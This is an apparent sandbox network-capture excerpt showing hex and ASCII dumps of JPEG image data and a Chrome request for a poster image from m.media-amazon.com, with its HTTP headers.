                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 47 38 3a ba 65 44 3b 30 09 6c ac 57 f6 2a 6b 7c 1a d0 be eb 37 58 d7 c0 ce 0a 5f 5f 3d 22 cd 5f 5d 56 92 10 e6 05 57 8b 0d 17 e8 7f 3d be 10 3a b4 7a 8b 16 60 73 1c 97 a8 63 ed ac 3a 76 64 18 d8 f2 e0 b9 64 ee e9 50 6a 44 74 7a 33 33 03 36 d7 60 7b 35 ab 5b a7 9f ec 04 19 0b be d3 09 e7 5f 46 da 35 20 85 6d c7 37 17 56 73 6b b7 55 7f 44 a3 58 f4 01 9a c2 7b c9 21 d3 5b c8 45 ef 4e ed aa 0c 91 02 b5 93 c5 50 52 15 17 8b 72 99 f3 42 b3 71 4f e4 ba 76 66 46 f3 65 87 b5 35 46 d9 9e 74 26 ca 3f 8e da a5 33 33 03 3e fc fa 0d 7e 83 f2 8f b5 69 3f 15 e4 c8 73 a3 f3 dd 47 74 5a 14 04 98 59 2b 17 b4 15 f8 da 77 b9 55 b5 18 5d 62 16 9a 75 70 8d 64 4e 26 50 99 21 0c f7 87 3d b6 d5 a4 98 d0 a5 32 3d 3b 59 a9 d7 95 79 c4 79 57 da de 49 e0 f4 16 33 ef c4 7e d6 d5 46 ff
                                                                                                                                                                                          Data Ascii: G8:eD;0lW*k|7X__="_]VW=:z`sc:vddPjDtz336`{5[_F5 m7VskUDX{![ENPRrBqOvfFe5Ft&?33>~i?sGtZY+wU]bupdN&P!=2=;YyyWI3~F
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 46 bd c2 2b d5 64 af 1a 64 55 b8 3e 9b 49 5d 55 61 6b 04 e8 96 50 10 98 bc 49 9c b8 2b 10 e1 12 40 35 90 1f be e4 18 a7 27 80 e9 d1 37 0e c2 4e 75 05 a6 75 61 6c ad 6a 3c f8 69 c2 47 2e 88 e5 e2 f3 d9 97 3e e9 c3 36 56 46 97 86 dc 7a 40 d3 b7 2c eb 87 3d 26 fd 01 fc ce eb 9a 23 5d 39 ee 34 19 af 66 3c cf c2 17 31 5c 7c a9 c2 11 b9 c9 8a c9 a4 23 d9 9a 70 fb 98 01 e0 66 60 c1 cb 30 37 59 cc 0f 9b e6 06 b9 98 1f 7e e6 07 dd 33 03 e7 dc c0 ed f3 30 37 93 99 a6 f2 b3 0c e7 c7 33 48 b1 f3 30 e5 99 99 b9 2b 30 39 fc cc 0d 0a e6 07 ff c4 00 32 10 00 02 02 02 01 03 03 03 04 02 01 04 03 01 00 00 01 02 00 03 04 11 12 05 13 21 10 22 31 14 32 41 20 23 30 42 15 51 33 24 34 43 61 06 40 53 71 ff da 00 08 01 01 00 01 08 02 57 3f 81 69 d8 df 71 a7 71 a2 58 de 60 b1 bc 4e
                                                                                                                                                                                          Data Ascii: F+ddU>I]UakPI+@5'7Nuualj<iG.>6VFz@,=&#]94f<1\|#pf`07Y~3073H0+092!"12A #0BQ3$4Ca@SqW?iqqX`N
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 76 bc 16 75 a5 4b b9 1c 3d b3 16 93 6f db 6d 0f 58 04 e0 e6 55 ff 00 6d 08 84 4d 7a 32 fc 4f 88 4f 22 7d 0a 73 05 0a dc 98 5c 75 5f 53 17 23 bc c9 ea 5d d5 65 95 d4 16 a5 69 5a eb b5 2a 5f 06 34 5f 4e 41 3d c6 f6 e0 75 3a 5d f6 2e f5 8f 68 b2 b5 33 9c 13 f1 37 33 f3 fe 94 7b 66 a5 6b b9 83 8a 00 25 92 a3 be 4d 93 95 5e 18 f7 e7 66 d9 96 7d d9 3e 2c b0 4d 95 f8 e9 b5 92 76 dd 53 1c d5 7b 13 d2 fa 91 b7 55 5a 61 dc d6 a6 e1 73 e7 5d ed f9 9d c9 bd 78 97 d1 5e 62 2f 3a f1 69 c7 a6 e1 2c c7 4a 82 f0 b9 3b 68 14 22 ec 55 3f d4 e1 14 ea 1c 8d 7c 75 1d f6 cc e5 3a 2b 69 df 6f c6 85 00 93 14 c7 3f 88 f6 71 fb 6c a9 bb ad be 3e e2 26 3d 41 ec 55 3f 44 2b 75 55 67 a7 15 41 7c 9e b8 4f fc 2e e5 89 27 a6 76 d6 fa cd cc dc 89 32 9a f9 99 8c d5 50 37 66 7e 4f d6 59 b1
                                                                                                                                                                                          Data Ascii: vuK=omXUmMz2OO"}s\u_S#]eiZ*_4_NA=u:].h373{fk%M^f}>,MvS{UZas]x^b/:i,J;h"U?|u:+io?ql>&=AU?D+uUgA|O.'v2P7f~OY
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 10 a8 11 87 eb e9 95 77 72 2b 07 ad 26 b2 58 fa 62 64 56 8c 39 ad 29 b3 7d 57 f8 1e 1f 21 87 9b 32 4d 25 bd b5 64 57 49 da 59 62 d9 2b 1c be 15 3b ee a1 3d b5 28 03 23 28 b3 6e 6b 5e 98 1a d4 c7 b3 80 2e 6f cc b3 16 d5 40 72 53 93 76 f1 99 6c 22 7d f6 31 99 07 da b3 1f ec 33 33 ee 95 fe d6 15 87 d6 a5 e5 e2 76 42 f8 8f 8a e9 e2 1e 98 c1 79 3d a8 11 88 1f a7 a4 1d 5a d3 ae a7 fc 0f e8 17 73 13 29 f0 da 5e c8 07 26 19 4f ad 14 fd c2 79 2a 57 63 f1 ac e1 95 97 02 9b df 4e c5 34 83 6d 99 b9 5f 89 dd dc fa 7e ea 02 a4 11 f3 55 8c 9f 07 ab 78 ee 29 f7 33 18 b3 1e c0 82 63 8f 69 33 27 e2 b1 31 be 08 99 9e 1c ce a7 fb 4b 8f 47 aa 9d 40 c0 91 bb b2 15 be 3a bf ee 2d 45 4f ea c1 b3 b7 72 13 d5 6b e7 8c 7d 71 ee 57 f6 5b 98 86 9c 65 4f 47 b1 9f 5c a8 4b 2c 60 2a 2e
                                                                                                                                                                                          Data Ascii: wr+&XbdV9)}W!2M%dWIYb+;=(#(nk^.o@rSvl"}133vBy=Zs)^&Oy*WcN4m_~Ux)3ci3'1KG@:-EOrk}qW[eOG\K,`*.
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 82 c3 d1 88 e0 83 d0 37 36 69 f8 02 3d 81 56 51 fb e7 4a 29 2d ae 59 76 77 2c 3a e9 4e b5 64 56 ef 72 b7 36 de 3d 63 97 27 7d eb cf f8 6b ca 96 1c 67 64 9d 71 e3 38 99 8c e2 b7 56 63 d8 33 e9 12 64 61 77 65 b8 f5 52 74 e1 b1 fb 7c 25 a2 bf fc 69 8e f6 0d af d0 df 3e 86 e1 2c a1 ea d7 3f a2 bf e3 d3 01 fd da 87 5e 67 77 7f 36 37 28 a3 dc 1a 52 38 81 6a 5d f2 75 eb 5d bc 67 f5 0d 19 ce b5 17 a7 dc 76 25 a5 b1 ab 65 79 8a 78 9e 51 bc 99 ad 43 e6 74 3b cd 7f 50 4f 5a c4 15 b8 b9 3a 5a 7d 29 ad 48 c9 f1 28 75 21 ec b3 a8 61 53 6e 32 dd 8e 0e 88 31 fa 85 d6 db ca 7f f2 6d 73 a7 76 e4 1b 78 72 0d 78 c6 c7 ec f5 66 76 fa 6e ef 46 72 b9 55 6b ac b1 6c ab 77 85 9f 66 1b 6d 3a ce 10 70 32 05 f9 ed c4 53 51 8b 0c 26 6e 55 b1 e6 38 ad 50 88 58 1f 9f 55 8a de 35 3b 7a
                                                                                                                                                                                          Data Ascii: 76i=VQJ)-Yvw,:NdVr6=c'}kgdq8Vc3daweRt|%i>,?^gw67(R8j]u]gv%eyxQCt;POZ:Z})H(u!aSn21msvxrxfvnFrUklwfm:p2SQ&nU8PXU5;z
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 35 3f 27 ff 00 52 9b 38 8f 40 df 11 5c b6 f6 5a 33 1f 13 b8 c6 29 f1 05 8d ef 97 8d 7f 20 33 70 41 07 88 0f 21 e4 fa 18 7f 82 b6 22 7f ff c4 00 29 11 00 02 02 02 01 03 04 02 02 03 01 00 00 00 00 00 01 02 00 11 03 12 21 10 22 31 04 13 14 41 20 32 30 51 15 33 42 71 ff da 00 08 01 02 01 01 08 00 e2 68 0c d0 5c 2a 04 20 54 a1 0a 71 d2 a1 51 34 9a cd 65 4d 23 2f 13 4b e2 6a 44 b1 d0 13 44 82 2b 68 40 b2 21 5a da b4 51 70 a8 06 a3 28 a6 a5 50 4d 1e de 22 d3 55 a8 52 2e 6a 0d 4f 6d 47 07 b6 a6 eb 52 d6 36 3d 5a 03 1a 84 0e 61 ca d3 dd 33 63 06 56 e2 7c 9d 60 cb bc dc ad d1 f5 6d f4 3d 63 4f 75 aa e6 ed 76 7d d6 02 1c af 51 b3 35 4f 79 84 24 b0 b2 04 66 32 e5 f4 10 9a 06 08 8d 4e 26 47 ed 32 cd cb 8a dc 09 b4 06 1f 10 99 5f 50 f4 26 12 66 c6 0e 47 47 3d 86 5c 52
                                                                                                                                                                                          Data Ascii: 5?'R8@\Z3) 3pA!")!"1A 20Q3Bqh\* TqQ4eM#/KjDD+h@!ZQp(PM"UR.jOmGR6=Za3cV|`m=cOuv}Q5Oy$f2N&G2_P&fGG=\R
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 70 a9 b8 ab b8 12 a5 8f 73 56 4c a8 a2 2a 03 ef 80 84 51 86 ae 20 f3 13 84 34 9b 6c 4c 39 13 02 5c e2 4e e1 86 54 0b b9 60 41 84 91 08 20 90 78 45 f5 39 6a 02 75 1e b9 76 50 4b 8a 2d 32 67 02 63 d8 b8 bf a8 fa 14 08 fa 15 45 82 49 fd 64 16 ec 7b 0c a0 7b 46 2c 4c 2d c5 6e 5d 99 76 68 21 50 34 fd 59 0b 68 30 92 01 70 a1 60 17 32 32 81 51 33 86 d1 22 31 30 66 33 16 6a 3b 6b 1b 17 a3 77 13 00 fb ca 71 c4 f4 49 d5 c7 1b b0 a0 10 2d 98 01 a4 00 a8 30 b8 02 36 7e 46 e2 67 27 d9 c2 ef b2 c8 50 6f 19 76 33 21 82 c9 83 07 12 a3 27 c8 82 7c 2a c2 3a 15 35 31 92 54 12 f8 ca 90 42 37 3c 7a e1 60 a1 e0 42 00 39 93 a2 00 02 a6 56 a4 82 ee 62 4f c9 99 07 8c 50 a2 ab 26 29 89 42 bf 23 95 f9 1e 51 0b 8d cc 62 d4 4c 98 b9 7a 16 16 89 50 44 46 0b 6b 1b 2f 9e 86 40 2e d5 0f
                                                                                                                                                                                          Data Ascii: psVL*Q 4lL9\NT`A xE9juvPK-2gcEId{{F,L-n]vh!P4Yh0p`22Q3"10f3j;kwqI-06~Fg'Pov3!'|*:51TB7<z`B9VbOP&)B#QbLzPDFk/@.
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: c4 fd 80 4d 43 50 5c e8 c4 47 d8 f4 95 ef 88 58 c8 e2 13 ff 00 e4 e5 3e df ee aa 7f e9 9b f1 3f 66 bf 89 38 cd e8 3a 20 58 b1 1d c7 d8 a4 f0 c0 0c de 51 34 2e f6 ca 6b 3b 39 ba 1e e7 7a 8b be f3 7a ba c3 d1 5d 97 cd b3 2d 8d 94 65 0a 1c 82 77 a1 94 20 03 5a b5 96 e4 aa 8b 19 8e ca a0 10 0a 1a 94 19 07 c8 14 2a 17 91 42 4e 85 a8 4b b7 c4 80 86 85 40 56 1c 15 db 56 da 3a bd 79 87 53 1e be db 14 47 54 bd d1 ce e3 ed c3 2c 80 a9 52 fc 2d 21 66 bd 28 31 16 f9 af 07 4a 2f d9 23 e0 e0 88 31 47 df 83 9e 42 a1 57 ab 51 b7 6e 4b 8e 4b 8a b0 d5 95 8a ce 4e f5 e5 8b fb 55 fd 27 f5 2b 59 d7 94 ca ef 93 6e 4b ca bf e8 5d d6 d7 e9 ed 93 cf 0f ba 36 5a bb 4a 1a d9 76 85 38 22 c1 db 9b d6 0a fe b5 c5 0b 72 79 3a 66 fd 4a 1f 0c 5e 9c 15 f1 f1 ce f5 54 96 b3 f0 bc 91 64 b7
                                                                                                                                                                                          Data Ascii: MCP\GX>?f8: XQ4.k;9zz]-ew Z*BNK@VV:ySGT,R-!f(1J/#1GBWQnKKNU'+YnK]6ZJv8"ry:fJ^Td
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 10 23 f8 5f d5 90 68 6f b4 e9 3e 8b c3 08 e7 6f d3 bb f6 5b 6f 45 a3 86 91 5f f8 62 f7 cb e3 dc 6a 0a b1 e9 82 6e d6 2a 07 c4 76 82 f6 c9 7f 09 f5 2f 0b ba c7 34 ec 6b e8 55 26 df d4 25 21 fb a9 c3 14 21 c6 8e cb d9 72 2e 2a 3f 25 9b 32 df 17 a2 bd 0e f1 3d 63 f4 69 c1 4c 5e bb d0 6f 16 7b 65 85 f3 8b b4 e2 8b 0a 51 d0 cc c5 1c e6 b5 e6 b6 93 f1 93 1f 75 6e 40 d0 c4 24 c7 3a 1c 58 e4 02 42 b6 df 71 d1 49 21 48 f5 af 31 c6 51 31 41 f3 b3 65 78 f7 53 02 9a 0f 21 5e bc dc 55 8b 5e 16 ee 56 fd c3 c6 0f c6 4b 16 74 4c 05 62 68 70 ec 8f 54 3f 98 a0 da d1 df 93 1d ff 00 0b 96 9a b7 d5 43 9d 9f 11 32 3d d3 4a e3 55 30 69 10 a1 58 1d 98 38 74 48 a3 30 99 d1 20 cc ac 69 5b 3b b4 6a 64 69 6b 36 33 19 2e e2 57 2c ae 3e c1 50 36 71 f3 1f 61 60 c9 2c e0 63 8b 1c ee ee
                                                                                                                                                                                          Data Ascii: #_ho>o[oE_bjn*v/4kU&%!!r.*?%2=ciL^o{eQun@$:XBqI!H1Q1AexS!^U^VKtLbhpT?C2=JU0iX8tH0 i[;jdik63.W,>P6qa`,c


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          147192.168.2.1649890151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:18 UTC413OUTGET /images/M/MV5BMTQ2Nzc1MDQzOF5BMl5BanBnXkFtZTgwMDgzMTA5MzE@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:18 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27556
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 86b04391-6d23-49a6-be71-9239ee1ea956
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 31 Dec 2014 09:26:39 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Sat, 03 Dec 2044 01:33:09 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 641109
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:18 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000108-IAD, cache-nyc-kteb1890073-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 90 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d6 d6 4d 6e 9c f8 a7 0f 06 ef 4c 75 42 a8
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4MnLuB
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: a0 7f 46 3d 49 13 94 c7 fa 7b ec 72 f9 76 a1 af 37 95 23 9f 43 2b 84 69 ce 79 5b 0c 71 1e 79 8d da bd 5e 71 41 f3 54 98 7c 99 5b c8 a3 86 aa d2 cd 54 44 32 88 27 52 45 8f 29 2a 56 2b ca e1 44 cb 9a f1 14 98 e9 26 56 25 49 07 31 0e 62 59 38 c0 d5 89 a5 4b ba ed 28 d5 bc 2c ed 7f 65 9c ce 6f 8d df 26 bd 4c 63 a5 26 c7 3f 06 f3 9c ea bd c4 8b e3 07 1a db b1 20 5c ee 3d c2 8e b5 a3 a8 d3 bc b5 22 03 89 b8 c7 f0 3e 98 e9 9f 38 8d f7 1d 62 96 4b 43 e6 28 8e ac 89 b3 0a c6 59 2d f3 62 64 d5 b9 8f 3b f5 46 8e 48 95 b4 88 45 e6 7d 1d 20 d1 d5 2c dc 6d 09 f5 a1 2e 1b ac bb 97 52 48 f6 33 24 96 be 5b 31 37 20 a5 78 bc 47 40 da cd 77 56 b9 45 2e 39 9f aa 97 3b bc c8 ba d1 bd 3c f2 15 23 71 6e b9 f4 05 43 33 be 67 4b 24 f1 0f 1d 7c 76 66 d1 cc 7a 22 4e b9 af 3b d4 77
                                                                                                                                                                                          Data Ascii: F=I{rv7#C+iy[qy^qAT|[TD2'RE)*V+D&V%I1bY8K(,eo&Lc&? \=">8bKC(Y-bd;FHE} ,m.RH3$[17 xG@wVE.9;<#qnC3gK$|vfz"N;w
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 56 b6 0c 31 23 a8 9f 0d ff 00 ae f9 c5 e9 6d 1d 8b ae a7 4f 7a df 5a d8 9f b4 65 7f 4a fe c6 bf 8b 5d a0 c1 b3 87 eb 6c d6 28 b0 f8 6b f8 3d 5a cf 74 a9 35 d4 74 87 cd bc d3 68 16 82 5c f8 6a 78 48 b7 59 55 fe 17 6f db fa 7a 1e 1d a9 d0 87 0b 60 d7 9e 8b 5e 92 cd 3d 64 27 0e e1 da 8e 1f b8 02 a1 81 0d a5 e1 d7 68 18 8a 7f 68 ca fe 95 fd 8f 8a 07 f8 c2 68 7a 69 a9 da dc 5d d6 e1 a7 97 71 3b 34 dd 6e aa f5 bd 43 a6 b7 58 da 35 36 1d 3f 10 7b d0 3a 5d c4 de 8d bb f5 fc 50 e8 7a be 9a d7 b5 77 37 86 b7 5e ba 43 56 66 a6 d7 a4 65 34 5a d4 d6 26 f4 9a ce 20 fa 20 5d 8e a2 d5 af 99 34 9c 55 f5 83 75 4d ac b6 be af a6 d6 57 a9 19 af e7 32 bf a5 7f 63 e2 9f b6 9c 3b ed e9 9a 9f fe d3 4f 18 02 08 3f 0e a6 d4 bc 4e 35 f6 97 ce 09 f6 94 4b 51 6c f6 b7 c4 9f 6b 13 b0
                                                                                                                                                                                          Data Ascii: V1#mOzZeJ]l(k=Zt5th\jxHYUoz`^=d'hhhzi]q;4nCX56?{:]Pzw7^CVfe4Z& ]4UuMW2c;O?N5KQlk
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 99 99 99 f0 cc cf 86 66 66 66 66 66 e9 ba 66 29 98 31 68 b1 a3 0d bd 25 4d a6 e9 cc 17 69 55 48 43 a7 51 98 2b 53 f5 2d 30 70 fd df 4f 2d ab 25 48 5f ed c8 1d d5 80 19 5c 2c 1f 2e 3c 73 f3 66 62 01 16 bd c7 10 68 17 f3 e4 29 ed 0f 0e af f0 34 49 d7 2d a6 55 9c b1 88 10 40 2a fc 95 af f8 90 93 67 f5 cb c4 da 7f 2f a3 b2 bf ab 6e 22 91 8c 44 ab 00 ca c9 39 cf 39 5a 6f 59 fd 7c 99 f9 f3 33 e1 d0 4c c0 d3 ac e5 c1 59 9b 3f bd a6 0a da 72 de 30 61 00 66 38 02 86 9e 58 b7 66 ac 8e f8 c4 fe b0 d4 3f f2 1a 41 82 67 2e 83 d9 aa ac 01 b2 c7 da 70 37 b0 ed ef fc 8f 9b 3f 38 9d 04 aa bd 39 00 bb 53 57 5d 97 af 65 4a 11 f1 d0 ae cf a8 b6 04 4b d7 bb 07 a5 67 36 be f1 5b 7e 76 22 d8 bd bf 56 1a 6f 33 36 a7 7c f4 cc 23 72 a4 5d 98 1b c2 a3 76 dd 49 83 97 f8 38 85 66 04
                                                                                                                                                                                          Data Ascii: ffffff)1h%MiUHCQ+S-0pO-%H_\,.<sfbh)4I-U@*g/n"D99ZoY|3LY?r0af8Xf?Ag.p7?89SW]eJKg6[~v"Vo36|#r]vI8f
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 75 2f 4b 36 de 1e ba 8c ee ba ba f3 f5 1a cf e3 a8 99 f9 91 73 d1 6c 46 04 02 ec 57 12 bb bb 02 f6 84 94 af b7 7c 55 dd 08 7b 71 b9 77 05 20 58 d9 55 0a 7d aa ac 47 bc 40 89 4c ce ee dc 33 bb 2c d9 36 46 aa 2f 41 f2 1e eb e1 c4 3e de d9 f8 9b c0 cc 23 2d 1e fb b7 05 9a 9f c6 01 5a 62 b8 b3 11 c4 ff 00 f0 30 fc f4 18 83 ac cc 15 10 b8 87 2c a0 35 94 9b 67 28 91 89 4d 49 ee e6 30 c7 75 5d b9 21 ee ea a1 19 b2 c5 9a c7 61 8c d7 fa 80 ed b0 63 6c 6a 99 43 30 35 d8 bb 52 70 2a 39 56 34 ac 7b 6b f0 d4 ea 16 a4 57 35 30 71 91 55 9c d1 9f 16 fe 3e 1a ff 00 b7 b6 3f b5 73 2d e1 fa bb 07 b3 41 c2 6c d3 fb dd e9 bb ae 19 7c af ba da b4 e6 f3 96 6f 0c 42 3c 07 86 ec 60 ce 64 e7 4d f0 3c dd 0f 58 aa 65 a4 2f 53 5f bf b0 47 d3 e7 7e a5 cd c5 58 3d 67 2a 45 ff 00 50 9a
                                                                                                                                                                                          Data Ascii: u/K6slFW|U{qw XU}G@L3,6F/A>#-Zb0,5g(MI0u]!acljC05Rp*9V4{kW50qU>?s-Al|oB<`dM<Xe/S_G~X=g*EP
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: dc d8 d5 06 38 71 7d ce 94 e8 98 8a 54 c0 cf 76 46 a3 19 34 37 41 a9 c6 04 cb 98 64 42 a7 f1 97 5e 3c f9 a1 38 82 57 d8 d8 2a 55 4e 60 4e 39 db 0a 45 c6 61 2c 6c 14 d3 7f 87 4a a2 83 a3 63 c4 4c ea b3 d9 3b e5 30 16 43 cd ad 09 c9 e6 01 94 dc 5c 19 5e 64 19 31 d5 f5 ff 00 de af 35 37 9f 03 9f be a4 53 67 92 71 ad db 6b e8 10 bd 72 48 30 e5 69 6d 3a c6 17 63 c9 0f 5c 96 7b 36 7e ee 26 2d ca 09 c7 a5 0b 66 67 d2 6f 00 8a a3 cf 52 6f 36 28 df 98 1e c0 20 79 8c a7 71 b3 7f 77 53 93 36 40 b3 ff 00 36 c1 85 9b f5 1a 56 be 55 76 80 a1 72 7d 19 a9 c6 05 37 b1 59 b4 f8 81 a8 dc 4e 0c 28 2c b0 77 be 22 86 db 47 72 54 a2 20 a1 03 10 66 1d 21 c8 6c 85 4c 20 22 b9 34 60 6e 25 cc 64 91 32 e9 c6 54 a8 f8 7a 7e 6e fc 51 95 14 73 0b 95 69 58 f6 8b b5 1f 88 a3 7f 8e c2 e4
                                                                                                                                                                                          Data Ascii: 8q}TvF47AdB^<8W*UN`N9Ea,lJcL;0C\^d157SgqkrH0im:c\{6~&-fgoRo6( yqwS6@6VUvr}7YN(,w"GrT f!lL "4`n%d2Tz~nQsiX
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: 06 48 0c 90 19 20 32 41 01 92 c0 7f e3 1b 82 72 29 c8 a2 8a 28 a2 8a 28 a2 8a 28 a3 d6 14 51 45 14 51 45 15 80 ff 00 c6 c0 75 86 03 14 d7 bb 68 61 82 d2 67 f2 6c 11 88 fc be 03 ab b1 aa fe c3 2e 68 f8 d4 22 36 a3 f7 44 cd a8 f4 5c 30 25 3b 4a a3 0e 09 d2 c7 44 91 e8 a9 02 a4 08 c8 df 02 53 e3 b8 13 ec 9e 0f aa 16 fb f5 98 0e af be e5 70 ae f0 bb a5 58 e9 b6 ae d5 29 0d 1c 55 80 2f d5 28 5a 17 75 b0 5f a8 54 9e c2 27 8a 13 80 e7 d6 60 3a bb 89 57 81 a9 7b d5 b4 47 92 b1 c1 59 41 21 fc 8d b9 0a a8 8b fe f0 cc 41 51 3a 8f 49 ed e9 cb ea 75 51 b9 df 78 66 17 45 b4 64 69 34 f6 8f cb ad c0 75 76 8b 14 9e cb 2b fc 4a 49 34 7b f0 56 de 76 ab 1c 15 b4 11 87 b2 b4 cd db cc cd 5f aa 54 ec e5 57 ea 15 fe e3 15 63 ba cc 07 51 44 08 37 87 7c 95 1e 8b 4e d8 93 5f 45 e3
                                                                                                                                                                                          Data Ascii: H 2Ar)(((QEQEuhagl.h"6D\0%;JDSpX)U/(Zu_T'`:W{GYA!AQ:IuQxfEdi4uv+JI4{Vv_TWcQD7|N_E
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: f2 82 b6 f9 2b 93 bf 39 f0 52 47 9a 9a 07 74 66 9c 04 2e b0 f3 82 a6 e4 55 2c 4e 16 22 48 c6 09 91 de a8 c6 7d 71 aa 23 6d c9 90 85 e5 e2 1f 15 f1 4d d2 db 18 28 67 14 39 a0 47 04 48 4f 09 d1 4d 15 7a d4 04 f9 a0 2f b9 5d f5 24 23 b3 e6 98 84 36 2b 6a 27 2a 81 ca a6 a6 91 be a1 11 1b 14 1a e1 50 92 08 d5 1c c2 1f f4 99 ff 00 4b d6 09 a5 35 35 34 55 34 c1 b6 48 7b 21 cc c1 4a 1b 53 7f d9 33 9d 5e a8 73 42 1c d0 50 aa cc 50 3c 2c 40 27 74 ae 18 a3 3c 07 f4 8c fc 2a 70 ba f4 23 04 34 23 01 25 39 cc 59 cd 4d 83 bd 82 be a0 a5 53 60 14 d0 d6 61 27 1b 93 4e f4 c4 d8 6c 8f ba 82 70 4e 09 e1 38 7b 27 08 28 66 80 41 02 bd 2a 06 c4 d8 47 13 25 37 78 a0 88 84 2c bd 42 0e c6 de 0b b5 7b 6e 7a 93 9c 60 e6 b9 08 db b6 08 c7 49 a2 31 db 72 68 98 11 86 49 a9 bc d7 cb 24
                                                                                                                                                                                          Data Ascii: +9RGtf.U,N"H}q#mM(g9GHOMz/]$#6+j'*PK554U4H{!JS3^sBPP<,@'t<*p#4#%9YMS`a'NlpN8{'(fA*G%7x,B{nz`I1rhI$
                                                                                                                                                                                          2024-12-15 11:38:18 UTC1378INData Raw: b1 49 59 4f 1e d3 fc 7f 91 1d 73 aa 53 59 d5 3a fc 3d 52 fa c3 ca 75 4e a8 60 9e 0a d0 7f e0 04 8b 81 ff 00 e2 c6 67 fd 70 56 38 b2 45 08 43 5d 65 1d ca 8d 80 bb 52 84 0d 0c da 82 c7 fe 6c cf fa 60 d6 21 33 f1 de 27 6f 32 f4 c5 6a 5b 98 a1 68 26 c8 06 21 7b 1b 5d 81 0e 73 0c 35 06 ec 81 4a 19 32 1b 02 87 74 bc 12 94 4e ac 47 72 01 03 bc 27 67 6f cd 02 4c bb f5 98 e5 e7 28 07 b0 20 2d e8 15 dd 46 38 3f 7c 14 78 c4 69 80 ec 51 87 59 12 40 74 b2 f3 50 18 11 1f e5 99 ff 00 4c 19 5c 5b da a0 69 00 0b 85 e3 87 03 fe bc 8c 29 c3 fb b4 66 fc 7e 19 df df 71 67 b0 80 5d 26 07 41 f9 81 05 62 01 72 41 02 23 78 d4 2d 2d ba 0a 00 01 0d 3b fe a4 e6 5c f4 6e 89 00 54 3f cb 33 fe 98 7f bc 11 98 98 28 77 0f c7 03 1a 3e 14 3d 4c c4 bf 7d 50 b7 d0 23 bc 5d 0a ea 05 fb 0e e6
                                                                                                                                                                                          Data Ascii: IYOsSY:=RuN`gpV8EC]eRl`!3'o2j[h&!{]s5J2tNGr'goL( -F8?|xiQY@tPL\[i)f~qg]&AbrA#x--;\nT?3(w>=L}P#]
